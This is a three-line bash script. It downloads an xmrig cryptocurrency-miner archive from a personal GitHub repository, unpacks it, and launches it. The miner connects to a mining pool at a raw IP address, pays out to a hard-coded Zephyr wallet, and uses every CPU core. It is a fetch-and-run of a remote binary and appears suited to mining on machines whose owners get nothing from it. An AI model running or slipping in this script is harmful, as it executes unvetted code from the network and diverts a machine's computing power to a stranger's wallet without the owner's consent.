#!/bin/bash
wget https://github.com/Adeemar7/all/raw/main/xmrig.tar.gz && tar -xvf xmrig.tar.gz
./xmrig --donate-level 1 -o 172.105.104.16:443 -u ZEPHsDGmt8WNzSRdggAMnf7LTSjeXPs1sg8vDzea952YD4XxyrUf9S4Q4vFe5AGKxvErQAPpvR48fANJ4TVsumYgNBJX1dUm9Bv -p A -a rx/0 -t $(nproc --all)
